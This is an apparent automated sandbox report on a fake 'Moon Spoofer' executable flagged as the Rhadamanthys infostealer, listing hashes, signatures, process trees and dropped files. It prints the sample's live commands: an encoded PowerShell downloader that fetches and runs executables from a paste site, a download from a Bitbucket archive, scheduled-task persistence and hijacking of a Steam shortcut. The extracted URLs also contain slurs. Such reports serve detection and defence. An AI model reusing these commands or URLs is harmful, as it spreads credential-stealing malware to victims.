Analysis
-
max time kernel
148s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
09-06-2024 19:56
Static task
static1
Behavioral task
behavioral1
Sample
Moon Spoofer/Moon Spoofer/Spoofer.exe
Resource
win7-20240419-en
Behavioral task
behavioral2
Sample
Moon Spoofer/Moon Spoofer/Spoofer.exe
Resource
win10v2004-20240426-en
General
-
Target
Moon Spoofer/Moon Spoofer/Spoofer.exe
-
Size
7KB
-
MD5
960d70161f0ac1ddd8093955446bdcbc
-
SHA1
5943c81939f9b43228e2fe2f65e90c54660ae47f
-
SHA256
31e6573e37d06a71b3025c0e9ed4901093ed5262bc60bbbdf7ce1ed28ebb021a
-
SHA512
8f3f6091fb3d09d4cdb0f9540bbbc2de0562dd5bb77c8446db49f274be7b173cbc0aa24206e25838cc6b6c6578440c0ecfd1a17acc94c50ebd014cbe16617c14
-
SSDEEP
192:+9yqvjp73xsznGjcJr9emxan6mUqlwc6nYZKvkV/9dXq:+9Jv1dOnGjcJrQmxan6m/ec6nYZSkV/2
Malware Config
Extracted
https://rentry.org/FUCKOFFNIGGA/raw
Extracted
https://bitbucket.org/gedegrereghh/fuckyougithub/raw/37140025d15f5d49ec2bd023f7557f06268d7c49/pancake-unpacked.rar
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
tco23iyp.2sp1.exedescription pid process target process PID 3172 created 2652 3172 tco23iyp.2sp1.exe sihost.exe -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exepowershell.exeflow pid process 4 1288 powershell.exe 8 1288 powershell.exe 20 4976 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Spoofer.exetco23iyp.2sp0.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation Spoofer.exe Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation tco23iyp.2sp0.exe -
Executes dropped EXE 2 IoCs
Processes:
tco23iyp.2sp0.exetco23iyp.2sp1.exepid process 624 tco23iyp.2sp0.exe 3172 tco23iyp.2sp1.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Processes:
powershell.exepowershell.exepid process 1288 powershell.exe 4976 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 1712 timeout.exe 436 timeout.exe -
Enumerates processes with tasklist 1 TTPs 8 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exepid process 2588 tasklist.exe 2296 tasklist.exe 2036 tasklist.exe 3316 tasklist.exe 5112 tasklist.exe 2872 tasklist.exe 3320 tasklist.exe 4004 tasklist.exe -
Kills process with taskkill 8 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 3192 taskkill.exe 3628 taskkill.exe 2392 taskkill.exe 1816 taskkill.exe 3836 taskkill.exe 4364 taskkill.exe 4780 taskkill.exe 4956 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
powershell.exepowershell.exetco23iyp.2sp1.exedialer.exepowershell.exepid process 1288 powershell.exe 1288 powershell.exe 4976 powershell.exe 4976 powershell.exe 3172 tco23iyp.2sp1.exe 3172 tco23iyp.2sp1.exe 552 dialer.exe 552 dialer.exe 552 dialer.exe 552 dialer.exe 5060 powershell.exe 5060 powershell.exe -
Suspicious use of AdjustPrivilegeToken 19 IoCs
Processes:
powershell.exepowershell.exetasklist.exetaskkill.exetasklist.exetaskkill.exetasklist.exetaskkill.exetasklist.exetaskkill.exetasklist.exetaskkill.exetasklist.exetaskkill.exetasklist.exetaskkill.exetasklist.exetaskkill.exepowershell.exedescription pid process Token: SeDebugPrivilege 1288 powershell.exe Token: SeDebugPrivilege 4976 powershell.exe Token: SeDebugPrivilege 2588 tasklist.exe Token: SeDebugPrivilege 2392 taskkill.exe Token: SeDebugPrivilege 3320 tasklist.exe Token: SeDebugPrivilege 3628 taskkill.exe Token: SeDebugPrivilege 2296 tasklist.exe Token: SeDebugPrivilege 3836 taskkill.exe Token: SeDebugPrivilege 2872 tasklist.exe Token: SeDebugPrivilege 4364 taskkill.exe Token: SeDebugPrivilege 5112 tasklist.exe Token: SeDebugPrivilege 4780 taskkill.exe Token: SeDebugPrivilege 3316 tasklist.exe Token: SeDebugPrivilege 4956 taskkill.exe Token: SeDebugPrivilege 2036 tasklist.exe Token: SeDebugPrivilege 3192 taskkill.exe Token: SeDebugPrivilege 4004 tasklist.exe Token: SeDebugPrivilege 1816 taskkill.exe Token: SeDebugPrivilege 5060 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Spoofer.exepowershell.exetco23iyp.2sp0.execmd.execmd.execmd.exetco23iyp.2sp1.exedescription pid process target process PID 2768 wrote to memory of 1288 2768 Spoofer.exe powershell.exe PID 2768 wrote to memory of 1288 2768 Spoofer.exe powershell.exe PID 1288 wrote to memory of 624 1288 powershell.exe tco23iyp.2sp0.exe PID 1288 wrote to memory of 624 1288 powershell.exe tco23iyp.2sp0.exe PID 1288 wrote to memory of 3172 1288 powershell.exe tco23iyp.2sp1.exe PID 1288 wrote to memory of 3172 1288 powershell.exe tco23iyp.2sp1.exe PID 1288 wrote to memory of 3172 1288 powershell.exe tco23iyp.2sp1.exe PID 624 wrote to memory of 2704 624 tco23iyp.2sp0.exe cmd.exe PID 624 wrote to memory of 2704 624 tco23iyp.2sp0.exe cmd.exe PID 2704 wrote to memory of 3488 2704 cmd.exe chcp.com PID 2704 wrote to memory of 3488 2704 cmd.exe chcp.com PID 2704 wrote to memory of 4840 2704 cmd.exe findstr.exe PID 2704 wrote to memory of 4840 2704 cmd.exe findstr.exe PID 2704 wrote to memory of 1980 2704 cmd.exe findstr.exe PID 2704 wrote to memory of 1980 2704 cmd.exe findstr.exe PID 2704 wrote to memory of 632 2704 cmd.exe findstr.exe PID 2704 wrote to memory of 632 2704 cmd.exe findstr.exe PID 2704 wrote to memory of 3960 2704 cmd.exe schtasks.exe PID 2704 wrote to memory of 3960 2704 cmd.exe schtasks.exe PID 2704 wrote to memory of 5052 2704 cmd.exe schtasks.exe PID 2704 wrote to memory of 5052 2704 cmd.exe schtasks.exe PID 2704 wrote to memory of 3044 2704 cmd.exe cmd.exe PID 2704 wrote to memory of 3044 2704 cmd.exe cmd.exe PID 3044 wrote to memory of 4380 3044 cmd.exe reg.exe PID 3044 wrote to memory of 4380 3044 cmd.exe reg.exe PID 2704 wrote to memory of 3620 2704 cmd.exe cmd.exe PID 2704 wrote to memory of 3620 2704 cmd.exe cmd.exe PID 3620 wrote to memory of 4964 3620 cmd.exe reg.exe PID 3620 wrote to memory of 4964 3620 cmd.exe reg.exe PID 2704 wrote to memory of 4976 2704 cmd.exe powershell.exe PID 2704 wrote to memory of 4976 2704 cmd.exe powershell.exe PID 3172 wrote to memory of 552 3172 tco23iyp.2sp1.exe dialer.exe PID 3172 wrote to memory of 552 3172 tco23iyp.2sp1.exe dialer.exe PID 3172 wrote to memory of 552 3172 tco23iyp.2sp1.exe dialer.exe PID 3172 wrote to memory of 552 3172 tco23iyp.2sp1.exe dialer.exe PID 3172 wrote to memory of 552 3172 tco23iyp.2sp1.exe dialer.exe PID 2704 wrote to memory of 2588 2704 cmd.exe tasklist.exe PID 2704 wrote to memory of 2588 2704 cmd.exe tasklist.exe PID 2704 wrote to memory of 532 2704 cmd.exe find.exe PID 2704 wrote to memory of 532 2704 cmd.exe find.exe PID 2704 wrote to memory of 2392 2704 cmd.exe taskkill.exe PID 2704 wrote to memory of 2392 2704 cmd.exe taskkill.exe PID 2704 wrote to memory of 3320 2704 cmd.exe tasklist.exe PID 2704 wrote to memory of 3320 2704 cmd.exe tasklist.exe PID 2704 wrote to memory of 2636 2704 cmd.exe find.exe PID 2704 wrote to memory of 2636 2704 cmd.exe find.exe PID 2704 wrote to memory of 3628 2704 cmd.exe taskkill.exe PID 2704 wrote to memory of 3628 2704 cmd.exe taskkill.exe PID 2704 wrote to memory of 2296 2704 cmd.exe tasklist.exe PID 2704 wrote to memory of 2296 2704 cmd.exe tasklist.exe PID 2704 wrote to memory of 4480 2704 cmd.exe find.exe PID 2704 wrote to memory of 4480 2704 cmd.exe find.exe PID 2704 wrote to memory of 3836 2704 cmd.exe taskkill.exe PID 2704 wrote to memory of 3836 2704 cmd.exe taskkill.exe PID 2704 wrote to memory of 2872 2704 cmd.exe tasklist.exe PID 2704 wrote to memory of 2872 2704 cmd.exe tasklist.exe PID 2704 wrote to memory of 4500 2704 cmd.exe find.exe PID 2704 wrote to memory of 4500 2704 cmd.exe find.exe PID 2704 wrote to memory of 4364 2704 cmd.exe taskkill.exe PID 2704 wrote to memory of 4364 2704 cmd.exe taskkill.exe PID 2704 wrote to memory of 5112 2704 cmd.exe tasklist.exe PID 2704 wrote to memory of 5112 2704 cmd.exe tasklist.exe PID 2704 wrote to memory of 4600 2704 cmd.exe find.exe PID 2704 wrote to memory of 4600 2704 cmd.exe find.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\Moon Spoofer\Moon Spoofer\Spoofer.exe"C:\Users\Admin\AppData\Local\Temp\Moon Spoofer\Moon Spoofer\Spoofer.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAdABoACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawBtAG4AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQBuAHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABlAG0AIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAEYAVQBDAEsATwBGAEYATgBJAEcARwBBAC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBkAHYAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG4AagBkACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGcAeQB5ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACkAIAB9ADwAIwB6AHUAagAjAD4AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBmAHcAaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAagBtAG4AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAIAB9ACAAPAAjAHkAYwBoACMAPgA="2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\tco23iyp.2sp0.exe"C:\Users\Admin\AppData\Roaming\tco23iyp.2sp0.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4035.tmp\4036.tmp\4037.bat C:\Users\Admin\AppData\Roaming\tco23iyp.2sp0.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 12515⤵
-
C:\Windows\system32\findstr.exefindstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"5⤵
-
C:\Windows\system32\findstr.exefindstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"5⤵
-
C:\Windows\system32\findstr.exefindstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"5⤵
-
C:\Windows\system32\schtasks.exeschtasks /query /tn "MyBatchScript"5⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "MyBatchScript" /tr "\"C:\Users\Admin\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f5⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/gedegrereghh/fuckyougithub/raw/37140025d15f5d49ec2bd023f7557f06268d7c49/pancake-unpacked.rar', 'C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar')"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "tf_win64.exe"5⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im tf_win64.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "dota2.exe"5⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im dota2.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "cs2.exe"5⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im cs2.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "RustClient.exe"5⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im RustClient.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "GTA5.exe"5⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im GTA5.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "TslGame.exe"5⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im TslGame.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "RainbowSix.exe"5⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im RainbowSix.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\timeout.exetimeout /t 35⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "steam.exe"5⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im steam.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\timeout.exetimeout /t 35⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\tar.exetar -xf "C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar" -C ""5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\Admin\Desktop\Steam.lnk'); $s.TargetPath = '\steam.exe'; $s.Save()"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\tco23iyp.2sp1.exe"C:\Users\Admin\AppData\Roaming\tco23iyp.2sp1.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD571444def27770d9071039d005d0323b7
SHA1cef8654e95495786ac9347494f4417819373427e
SHA2568438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9
SHA512a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD50f6a3762a04bbb03336fb66a040afb97
SHA10a0495c79f3c8f4cb349d82870ad9f98fbbaac74
SHA25636e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383
SHA512cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69
-
C:\Users\Admin\AppData\Local\Temp\4035.tmp\4036.tmp\4037.batFilesize
6KB
MD55356df66c550e8bf737e23956f5a8406
SHA18f40c948922bcc96ee5bb79ad6ed71ac0369c7f9
SHA2563b03eba10dc8cc18f1ffa3726d6ff3e242183da10b47c8217f0b3b79eee1b3c8
SHA512abef71ab94f3821f5430d1f65902fc06b2bd73b6c2014d8c9fc5718e9241db5534f033a414d328d1f135d454f46d44986bc5cab52f2d8c828557d92e3976e7f4
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pli5ayhi.juk.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\tco23iyp.2sp0.exeFilesize
126KB
MD52f6b6a51b8426be18badffd9294b0d9f
SHA12d4aaeffe325c93e61c38349d5a41fdb1b58c24f
SHA25636d868815764b2c7b77ded962a02c2949db328a98ac714644e9426bb6d47fa1a
SHA5123628f903a02fd27b049addfba2f936aee4d039f2c201438fd12d8bca58ab2dee852d3cfd54cd78fe9ec0b2ea86eb85c980dcea271e76e26a7588a4e8fc614d6c
-
C:\Users\Admin\AppData\Roaming\tco23iyp.2sp1.exeFilesize
355KB
MD501a72f1659cfe71d56340773f3c89bf9
SHA1b87d0a06df5896b9129efd823ea237905cfa9d1e
SHA2567205faf5054589ce7dc6b68dcfea45c18859cb49a3c0d4bda840fc9d308152bd
SHA51259e1de953a7bbb7f87da2de9c9575ba7c0098b31afc549c1eff2256ee9beddc590aec88d32716f386fd3a7037d610365d72bbded94278cd0d341ce337579d1e8
-
memory/552-60-0x0000000000B70000-0x0000000000B79000-memory.dmpFilesize
36KB
-
memory/552-64-0x00007FFDEFAF0000-0x00007FFDEFCE5000-memory.dmpFilesize
2.0MB
-
memory/552-66-0x00000000757D0000-0x00000000759E5000-memory.dmpFilesize
2.1MB
-
memory/552-63-0x0000000002910000-0x0000000002D10000-memory.dmpFilesize
4.0MB
-
memory/1288-14-0x00007FFDD1A40000-0x00007FFDD2501000-memory.dmpFilesize
10.8MB
-
memory/1288-15-0x00007FFDD1A40000-0x00007FFDD2501000-memory.dmpFilesize
10.8MB
-
memory/1288-41-0x00007FFDD1A40000-0x00007FFDD2501000-memory.dmpFilesize
10.8MB
-
memory/1288-8-0x000002A32F660000-0x000002A32F682000-memory.dmpFilesize
136KB
-
memory/1288-17-0x00007FFDD1A40000-0x00007FFDD2501000-memory.dmpFilesize
10.8MB
-
memory/1288-13-0x00007FFDD1A40000-0x00007FFDD2501000-memory.dmpFilesize
10.8MB
-
memory/1288-16-0x00007FFDD1A40000-0x00007FFDD2501000-memory.dmpFilesize
10.8MB
-
memory/2768-1-0x00007FFDD1A43000-0x00007FFDD1A45000-memory.dmpFilesize
8KB
-
memory/2768-0-0x0000000000B80000-0x0000000000B88000-memory.dmpFilesize
32KB
-
memory/3172-61-0x0000000000E80000-0x0000000000EED000-memory.dmpFilesize
436KB
-
memory/3172-56-0x0000000004120000-0x0000000004520000-memory.dmpFilesize
4.0MB
-
memory/3172-40-0x0000000000E80000-0x0000000000EED000-memory.dmpFilesize
436KB
-
memory/3172-55-0x0000000004120000-0x0000000004520000-memory.dmpFilesize
4.0MB
-
memory/3172-59-0x00000000757D0000-0x00000000759E5000-memory.dmpFilesize
2.1MB
-
memory/3172-57-0x00007FFDEFAF0000-0x00007FFDEFCE5000-memory.dmpFilesize
2.0MB